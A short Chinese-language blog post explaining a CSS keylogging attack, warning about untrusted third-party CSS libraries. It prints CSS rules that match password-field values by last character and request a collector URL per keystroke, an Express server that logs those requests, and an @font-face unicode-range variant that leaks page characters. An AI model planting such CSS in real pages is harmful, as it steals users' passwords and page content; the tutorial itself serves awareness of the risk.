CSS攻击：记录用户密码

简单的CSS代码，甚至不符合图灵完备的语言，可是也能成为一些攻击者的工具，下面简单介绍一下如何使用CSS去记录用户的密码。可是这些CSS脚本会出如今第三方CSS库中，因此使用第三方CSS库也须要谨慎，确保代码安全。
直接上代码解析：

input[type="password"][value$="0"] { 
    background-image: url("http://localhost:3000/0"); 
}
input[type="password"][value$="1"] { 
    background-image: url("http://localhost:3000/1"); 
}
input[type="password"][value$="2"] { 
    background-image: url("http://localhost:3000/2"); 
}复制代码

以上是部分代码,咱们来解析一下CSS代码
input[type="password"]是css选择器，做用是选择密码输入框，[value$="0"]表示匹配输入的值是以0结尾的。
因此：

input[type="password"][value$="0"] { 
    background-image: url("http://localhost:3000/0"); 
}复制代码

上面代码的意思就是若是你在密码框中输入0，就去请求http://localhost:3000/0接口，可是浏览器默认状况下是不会将用户输入的值存储在value属性中，可是有的框架会同步这些值，例如React。
因此只要使用了以下图的脚本就能去存储用户的输入数据信息。

咱们再来看一下服务器端的代码：

const express = require("express");
const app = express();

app.get("/:key", (req, res) => {
   process.stdout.write(req.params.key);
   return res.sendStatus(400);
});

app.listen(3000, () => console.log("启动，监听3000端口"));复制代码

使用express建立服务器，监听3000端口，只要请求http://localhost:3000/:key，就能输出key的值，就能在服务器上记录输入的值。
因此只要在每输入一个值都匹配，而后经过 background-image 去请求一个已经准备好的接口，就能记录用户的输入。

相似的方法记录用户的内容的CSS代码

@font-face {  
   font-family: blah;  
   src: url('http://localhost:3000/a') format('woff');  
   unicode-range: U+85;
}
html {  
   font-family: blah, sans-serif;
}复制代码

你使用的的css的简单的字体库，只要你的页面中包含a，就会去请求http://localhost:3000/a，这样就能知道你的页面中包含有a字符。

欢迎关注个人公众号：前端八点半